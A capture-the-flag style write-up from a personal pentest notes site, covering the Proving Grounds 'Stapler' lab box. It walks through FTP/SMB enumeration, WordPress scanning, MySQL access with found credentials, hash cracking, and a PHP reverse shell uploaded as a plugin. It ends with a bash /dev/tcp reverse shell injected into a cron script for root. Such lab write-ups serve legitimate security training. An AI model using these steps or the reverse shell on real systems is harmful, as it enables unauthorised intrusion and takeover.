AesirSec
  • 🏑Home
  • πŸ“šBlog
    • Radio Silence
    • OSCP Strategy
    • Plan for 2023
    • PNPT
    • Plan for 2022
    • eJPT
  • ❓Enumeration
  • 🐧Linux
    • Commands
    • Restricted Shell Bypassing
    • Stabilize Shell
  • πŸͺŸWindows
    • Commands
    • Transferring Files
  • πŸ“•Active Directory
    • Enumeration
    • Attacking AD Initial Vectors
    • Ipv6 attacks
    • Post Compromise Enum
    • Strategy
  • #️Privilege Escalation
    • 🐳Docker
    • 🐧Linux
    • πŸͺŸWindows
  • πŸ•ΈοΈWeb Apps
    • LFI
    • Apache
    • CSRF
    • PHP
    • XSS
    • SQLi
    • Pay Loads All The Things
  • πŸ‘ΎBuffer Overflows
  • πŸ’»Programming
    • 🐍Python
  • πŸ‘¨β€πŸ’»Ports/Technologies
    • FTP - Port 21
    • SSH - Port 22
    • Telnet - Port 23
    • DNS - 53
    • HTTP/S - 80/443
    • RPC - 135
    • SMB - 139/445
    • LDAP - 389/636
    • SQL - Port 3306
    • Docker
    • IIS
  • πŸ› οΈTools
    • ffuf
    • wwwtree
    • Rogue LDAP Servers
    • Wpscan
    • crackmapexec
    • msfvenom
    • John the Ripper
    • Hydra
  • 🐬Flipper Zero/ Radio Frequency
  • πŸ—ƒοΈBoxes/Write Ups
    • Template
    • πŸ‰Game Of Active Directory v2 - Day 1
    • Proving Grounds
      • Proving Grounds Practice
        • πŸ“šHeist
        • πŸ“šHutch
        • πŸͺŸInternal
        • πŸͺŸShenzi
        • πŸͺŸJacko
        • πŸͺŸDVR4 - qued
        • πŸͺŸNickel
        • πŸͺŸSlort
        • 🐧Walla
        • 🐧Snookums
        • 🐧Exfiltrated
        • 🐧Wheels
        • 🐧ClamAV
        • πŸͺŸSquid
        • πŸͺŸAlgernon
        • πŸͺŸHelpdesk
      • Proving Grounds Play
        • πŸͺŸSams
        • 🐧Assertion101
        • 🐧DriftingBlues6
        • 🐧DC-2 - unfinished
        • 🐧InfoSecPrep
        • 🐧Stapler
        • 🐧BBSCute
        • 🐧SoSimple
        • 🐧Solstice
        • 🐧FunBoxEasyEnum
        • 🐧Sumo
        • 🐧FunBoxRookie
        • 🐧MoneyBox
        • 🐧CyberSploit1
        • 🐧Wpawn
        • 🐧Dawn
        • 🐧Pwned1
        • 🐧FunBoxEasy
        • 🐧DC-1
    • TryHackMe
      • πŸͺŸAnthem
  • πŸ”—Helpful Links
  • πŸ§™whoami
  • πŸ΄β€β˜ οΈGithub
  • πŸ“‘Discord
  • 🐦Twitter
Powered by GitBook
On this page
  • Enumeration
  • Service Enumeration
  • Port 21
  • Port 80
  • Port 139
  • Port 12380
  • DOH!
  • Port 3306
  • Port 12380 - Revisited
  • Shell
  • Root

Was this helpful?

  1. Boxes/Write Ups
  2. Proving Grounds
  3. Proving Grounds Play

Stapler

PreviousInfoSecPrepNextBBSCute

Last updated 2 years ago

Was this helpful?

Enumeration

Nmap scan

nmap -sV -p- -A 192.168.197.148

Service Enumeration

Port 21

Port 21 allows anonymous FTP login.

Note file from FTP.

Now we know we have at least three user's Harry, Elly, and John.

Port 80

Port 139

SMB allows anonymous login.

Grabbed all files from kathy and tmp.

Port 12380

Nikto scan

DOH!

So I'm an idiot and spent a few hours wondering why I could do no scans against this box's web servers..... its using HTTPS not HTTP.

The continued IP is 192.168.87.148 Gobuster scan

gobuster dir -k -u  https://192.168.87.148:12380/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,html,php  -t 200

Robots.txt

Interesting places

WPScan

wpscan  --url https://192.168.87.148:12380/blogblog --disable-tls-checks --enumerate

Had to get a hint here.

List of plugins.

Had to get a hint here was not finding anything on WPScans website about these plugins. Found that searchsploit would bring up an exploit is seached for advance video.

Port 3306

Connected via MySQL

mysql -uroot -pplbkac -h192.168.87.148

Port 12380 - Revisited

Used root credentials to log into myphpadmin webpage.

Returned on 1/23/2023. New IP is 192.168.112.148 Grabbed all the hashes for cracking.

Cracking the hashes.

john hashes.txt  --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

Found that John was an admin user when checking the accounts.

Found that I could upload my own plugin. Uploaded my shell. Found that it will prompt for a FTP login but one is not required it will still upload the file.

Found the shell in /blogblog/wp-content/uploads/

Shell

Opened rev3.php for my shell.

Stabilized the shell.

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg 
stty rows 38 columns 116

Dropped Linpeas on the machine. Found an interesting file I could edit.

Added reverse shell to cron-logrotate.sh and waited a few minutes.

echo "bash -c 'exec bash -i &>/dev/tcp/192.168.49.112/6698 <&1'" > cron-logrotate.sh

Root

Having trouble getting this exploit from searchsploit to run. Found another python exploit at this one is working for LFI.

πŸ—ƒοΈ
🐧
https://github.com/gtech/39646/blob/master/39646.py